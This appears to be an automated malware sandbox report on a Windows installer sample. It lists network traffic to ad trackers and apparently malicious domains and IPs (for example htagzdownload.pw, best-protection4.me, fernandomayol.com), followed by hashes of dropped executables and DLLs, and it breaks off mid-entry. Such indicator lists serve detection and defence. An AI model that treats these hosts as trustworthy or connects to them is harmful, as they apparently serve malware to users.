US 172.67.13.182:443 mwzeom.zeotap.com tcp
US 8.8.8.8:53 dp2.33across.com udp
US 208.100.17.180:443 dp2.33across.com tcp
US 208.100.17.180:443 dp2.33across.com tcp
US 8.8.8.8:53 i.simpli.fi udp
NL 169.50.137.179:443 i.simpli.fi tcp
NL 169.50.137.179:443 i.simpli.fi tcp
US 8.8.8.8:53 ib.adnxs.com udp
NL 185.33.221.53:443 ib.adnxs.com tcp
NL 185.33.221.53:443 ib.adnxs.com tcp
US 8.8.8.8:53 cdn-tc.33across.com udp
US 104.16.39.14:443 cdn-tc.33across.com tcp
US 104.16.39.14:443 cdn-tc.33across.com tcp
US 8.8.8.8:53 idpix.media6degrees.com udp
US 104.18.10.79:443 idpix.media6degrees.com tcp
US 104.18.10.79:443 idpix.media6degrees.com tcp
US 8.8.8.8:53 id5-sync.com udp
US 8.8.8.8:53 tcp
US 8.8.8.8:53 audex.userreport.com udp
US 8.8.8.8:53 loadm.exelator.com udp
NL 65.9.83.100:443 audex.userreport.com tcp
NL 65.9.83.100:443 audex.userreport.com tcp
US 8.8.8.8:53 px.surveywall-api.survata.com udp
US 52.26.6.186:443 loadm.exelator.com tcp
US 52.26.6.186:443 loadm.exelator.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
US 54.89.130.42:443 px.surveywall-api.survata.com tcp
US 54.89.130.42:443 px.surveywall-api.survata.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 18.203.33.226:443 dpm.demdex.net tcp
IE 18.203.33.226:443 dpm.demdex.net tcp
DE 37.252.173.38:443 secure.adnxs.com tcp
DE 37.252.173.38:443 secure.adnxs.com tcp
US 8.8.8.8:53 sync.tag.clrstm.com udp
US 8.8.8.8:53 global.ib-ibi.com udp
US 216.46.185.183:443 global.ib-ibi.com tcp
US 216.46.185.183:443 global.ib-ibi.com tcp
US 8.8.8.8:53 sync.crwdcntrl.net udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 52.4.226.65:443 sync.crwdcntrl.net tcp
US 52.4.226.65:443 sync.crwdcntrl.net tcp
US 34.204.22.100:443 sync.srv.stackadapt.com tcp
US 34.204.22.100:443 sync.srv.stackadapt.com tcp
US 34.231.251.31:443 ps.eyeota.net tcp
US 34.231.251.31:443 ps.eyeota.net tcp
US 8.8.8.8:53 sync.tidaltv.com udp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
US 8.8.8.8:53 dt-secure.videohub.tv udp
US 199.127.207.184:443 dt-secure.videohub.tv tcp
US 199.127.207.184:443 dt-secure.videohub.tv tcp
IE 52.48.53.255:443 sync.tidaltv.com tcp
IE 52.48.53.255:443 sync.tidaltv.com tcp
US 8.8.8.8:53 cm.adgrx.com udp
US 8.8.8.8:53 sync.mathtag.com udp
CH 185.29.132.241:443 sync.mathtag.com tcp
CH 185.29.132.241:443 sync.mathtag.com tcp
NL 72.251.241.196:443 cm.adgrx.com tcp
NL 72.251.241.196:443 cm.adgrx.com tcp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
US 207.198.113.171:443 pixel-sync.sitescout.com tcp
US 207.198.113.171:443 pixel-sync.sitescout.com tcp
US 8.8.8.8:53 sync-tm.everesttech.net udp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 8.8.8.8:53 ib.mookie1.com udp
US 69.169.86.39:443 ib.mookie1.com tcp
US 69.169.86.39:443 ib.mookie1.com tcp
US 8.8.8.8:53 d.turn.com udp
NL 46.228.164.13:443 d.turn.com tcp
NL 46.228.164.13:443 d.turn.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
US 8.8.8.8:53 rtd-tm.everesttech.net udp
US 151.101.2.49:443 rtd-tm.everesttech.net tcp
US 151.101.2.49:443 rtd-tm.everesttech.net tcp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 id5-sync.com tcp
DE 51.89.21.8:443 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
NL 46.228.164.13:443 d.turn.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
N/A 127.0.0.1:443 tcp
N/A 127.0.0.1:443 tcp
N/A 127.0.0.1:443 tcp
N/A 127.0.0.1:443 tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 htagzdownload.pw udp
US 8.8.8.8:53 config.teams.microsoft.com udp
US 52.113.194.132:443 config.teams.microsoft.com tcp
US 8.8.8.8:53 htagzdownload.pw udp
US 162.0.220.187:80 requestimmersive.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.bing.com udp
US 204.79.197.200:443 www.bing.com tcp
US 204.79.197.200:443 www.bing.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 192.243.59.20:443 www.profitabletrustednetwork.com tcp
US 8.8.8.8:53 venetrigni.com udp
US 52.45.132.150:443 venetrigni.com tcp
US 52.45.132.150:443 venetrigni.com tcp
US 8.8.8.8:53 best-protection4.me udp
US 104.21.82.246:443 best-protection4.me tcp
US 104.21.82.246:443 best-protection4.me tcp
US 8.8.8.8:53 crl3.digicert.com udp
US 93.184.220.29:80 crl3.digicert.com tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 kimoangel.info udp
US 8.8.8.8:53 my.rtmark.net udp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.59:443 images.scanalert.com tcp
NL 65.9.83.59:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 52.214.44.171:443 dpm.demdex.net tcp
IE 52.214.44.171:443 dpm.demdex.net tcp
US 8.8.8.8:53 s.go-mpulse.net udp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.80.224.132:443 s.go-mpulse.net tcp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 mcafee12.tt.omtrdc.net udp
US 54.69.39.99:443 mcafee12.tt.omtrdc.net tcp
US 54.69.39.99:443 mcafee12.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 36c3fef2.akstat.io udp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 c.evidon.com udp
DE 23.45.239.236:443 c.evidon.com tcp
DE 23.45.239.236:443 c.evidon.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 52.4.153.129:443 w.usabilla.com tcp
US 52.4.153.129:443 w.usabilla.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 8.8.8.8:53 t.co udp
US 104.244.42.133:443 t.co tcp
US 104.244.42.133:443 t.co tcp
US 104.244.42.131:443 analytics.twitter.com tcp
US 104.244.42.131:443 analytics.twitter.com tcp
US 8.8.8.8:53 d6tizftlrpuof.cloudfront.net udp
NL 65.9.84.212:443 d6tizftlrpuof.cloudfront.net tcp
NL 65.9.84.212:443 d6tizftlrpuof.cloudfront.net tcp
US 8.8.8.8:53 varmisende.com udp
UZ 91.203.174.38:80 varmisende.com tcp
US 8.8.8.8:53 fernandomayol.com udp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 securebiz.org udp
UZ 91.203.174.38:80 securebiz.org tcp
NL 146.70.35.170:30905 tcp
SC 185.215.113.29:8678 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 api.2ip.ua udp
UA 77.123.139.190:443 api.2ip.ua tcp
EG 41.41.255.235:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
US 8.8.8.8:53 api.ip.sb udp
US 104.26.12.31:443 api.ip.sb tcp
UA 77.123.139.190:443 api.2ip.ua tcp
US 104.26.12.31:443 api.ip.sb tcp
UZ 91.203.174.38:80 securebiz.org tcp
US 8.8.8.8:53 tbpws.top udp
EG 41.41.255.235:80 fernandomayol.com tcp
KR 222.236.49.123:80 tbpws.top tcp
EG 41.41.255.235:80 fernandomayol.com tcp
KR 222.236.49.123:80 tbpws.top tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 telete.in udp
DE 195.201.225.248:443 telete.in tcp
MD 5.181.156.77:80 5.181.156.77 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 gheorghip.tumblr.com udp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
EG 41.41.255.235:80 fernandomayol.com tcp
US 8.8.8.8:53 tuzlacastajanslari.bykmedya.com udp
TR 31.192.214.222:80 tuzlacastajanslari.bykmedya.com tcp
US 8.8.8.8:53 fernandomayol.com udp
DE 144.76.183.53:63565 tcp
US 8.8.8.8:53 jaliemaval.xyz udp
RU 95.213.165.250:80 jaliemaval.xyz tcp
US 104.26.12.31:443 api.ip.sb tcp
US 8.8.8.8:53 fernandomayol.com udp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
MY 103.169.90.205:80 103.169.90.205 tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
US 74.114.154.22:443 gheorghip.tumblr.com tcp
BG 46.10.64.191:80 fernandomayol.com tcp
DE 162.55.179.90:80 162.55.179.90 tcp
DE 195.201.225.248:443 telete.in tcp
MD 5.181.156.77:80 5.181.156.77 tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
US 8.8.8.8:53 dpm.demdex.net udp
IE 54.194.53.150:443 dpm.demdex.net tcp
IE 54.194.53.150:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 52.39.53.231:443 mboxedge35.tt.omtrdc.net tcp
US 52.39.53.231:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 36c3fef2.akstat.io udp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 52.200.158.249:443 l.evidon.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
FR 13.36.218.177:443 smetrics.mcafee.com tcp
US 104.244.42.133:443 t.co tcp
US 104.244.42.133:443 t.co tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 8.8.8.8:53 w.usabilla.com udp
US 54.160.67.78:443 w.usabilla.com tcp
US 54.160.67.78:443 w.usabilla.com tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 www.directdexchange.com udp
US 35.201.70.46:80 www.directdexchange.com tcp
US 35.201.70.46:80 www.directdexchange.com tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 35.201.70.46:443 www.directdexchange.com tcp
US 8.8.8.8:53 fernandomayol.com udp
KR 210.182.29.70:80 fernandomayol.com tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 vexacion.com udp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 8.8.8.8:53 kimoangel.info udp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
US 8.8.8.8:53 dpm.demdex.net udp
IE 54.154.124.189:443 dpm.demdex.net tcp
IE 54.154.124.189:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 54.69.39.99:443 mboxedge35.tt.omtrdc.net tcp
US 54.69.39.99:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
US 8.8.8.8:53 36c3fef2.akstat.io udp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
NL 104.80.228.241:443 tags.tiqcdn.com tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 analytics.twitter.com udp
US 104.244.42.133:443 t.co tcp
US 104.244.42.133:443 t.co tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
FR 15.236.176.210:443 smetrics.mcafee.com tcp
FR 15.236.176.210:443 smetrics.mcafee.com tcp
US 8.8.8.8:53 l.evidon.com udp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 52.4.153.129:443 w.usabilla.com tcp
US 52.4.153.129:443 w.usabilla.com tcp
UA 77.123.139.190:443 api.2ip.ua tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 95.101.58.226:443 c.go-mpulse.net tcp
NL 139.45.197.236:80 vexacion.com tcp
NL 139.45.197.236:80 vexacion.com tcp
US 8.8.8.8:53 my.rtmark.net udp
NL 139.45.195.8:443 my.rtmark.net tcp
NL 139.45.195.8:443 my.rtmark.net tcp
US 104.248.185.101:443 kimoangel.info tcp
US 104.248.185.101:443 kimoangel.info tcp
US 8.8.8.8:53 www.mcafee.com udp
NL 104.126.126.228:443 www.mcafee.com tcp
NL 104.126.126.228:443 www.mcafee.com tcp
US 8.8.8.8:53 static.doubleclick.net udp
US 8.8.8.8:53 tags.tiqcdn.com udp
US 8.8.8.8:53 images.scanalert.com udp
NL 65.9.83.32:443 images.scanalert.com tcp
NL 65.9.83.32:443 images.scanalert.com tcp
US 8.8.8.8:53 dpm.demdex.net udp
IE 54.72.70.127:443 dpm.demdex.net tcp
IE 54.72.70.127:443 dpm.demdex.net tcp
US 8.8.8.8:53 mboxedge35.tt.omtrdc.net udp
US 52.27.114.80:443 mboxedge35.tt.omtrdc.net tcp
US 52.27.114.80:443 mboxedge35.tt.omtrdc.net tcp
US 8.8.8.8:53 c.go-mpulse.net udp
NL 2.16.84.148:443 c.go-mpulse.net tcp
NL 2.16.84.148:443 c.go-mpulse.net tcp
US 8.8.8.8:53 36c3fef2.akstat.io udp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
NL 104.80.224.132:443 36c3fef2.akstat.io tcp
US 8.8.8.8:53 static.ads-twitter.com udp
NL 151.101.36.157:443 static.ads-twitter.com tcp
NL 151.101.36.157:443 static.ads-twitter.com tcp
US 8.8.8.8:53 smetrics.mcafee.com udp
US 8.8.8.8:53 l.evidon.com udp
FR 15.236.176.210:443 smetrics.mcafee.com tcp
FR 15.236.176.210:443 smetrics.mcafee.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 104.244.42.195:443 analytics.twitter.com tcp
US 54.161.40.243:443 l.evidon.com tcp
US 104.244.42.133:443 t.co tcp
US 104.244.42.133:443 t.co tcp
US 8.8.8.8:53 w.usabilla.com udp
US 54.160.67.78:443 w.usabilla.com tcp
US 54.160.67.78:443 w.usabilla.com tcp

Files

memory/2756-115-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 68a1742859c497907c6a167d6dbaa542
SHA1 74d6a455844147a3612c52aecf9e895b7081abd9
SHA256 dc32cc0fc805b5396856e53ab0b9eb0eadf8ad6803f9b2b29b74882d43b4bcd1
SHA512 0c0b8ae644ede968b1b5ac14aa226f6127984ff4c8d1d0e0cea51a1f1f47cdb30ff996164f42123344d985633fef17b256684379e9d2a8ab9af2153c0f162fa5

memory/3636-118-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\setup_install.exe

MD5 1bc35dcd03916cefd0fb9704c41279b1
SHA1 0b17959d42867edb93ebf7cc60b5025635fc7749
SHA256 38839437dd9d9f2395e9f02b9b52bd4c173ca4ad80a33605ca16e7570baa7a89
SHA512 b132d142ddbcf728054ac3c2df7e6418973771aafe630d26ed116fa94a8eae9d40ebae505a90829bb67d10208963c29aabb93c052317823c55c029f21a5e8ef6

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3636-133-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3636-134-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3636-135-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3452-137-0x0000000000000000-mapping.dmp

memory/2948-141-0x0000000000000000-mapping.dmp

memory/4100-143-0x0000000000000000-mapping.dmp

memory/4116-145-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat199ba8a4637dcb034.exe

MD5 5af7bc821a1501b38c4b153fa0f5dade
SHA1 467635cce64ae4e3ce41d1819d2ec6abdf5414f3
SHA256 773f2e6660cc3a2b3bb55c0b88a74d24db0dfc5c0cef7c5b13ec9aac48f5d6b6
SHA512 53fd58565d6ca16fc9ca7113cd90657ef8c09fa2efcc9603f6da5c2a3050aaeb1d8edfc46b2b40d80b44a8ccce27d9e4fc6bac62bac236fdc360ebdab3b5c146

memory/4168-149-0x0000000000000000-mapping.dmp

memory/4184-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4CAA23C3\Sat19e6a852f849bb2.exe

MD5 ec2b5ec434be3587aa4075d30c2dc958
SHA1 fb215d328a6ceb20abc5c94c4bce4077209f5c2e
SHA256 521232ff78199868ecf5e6033b4f6d9c9958d9361245ce44b967af335cc328e6
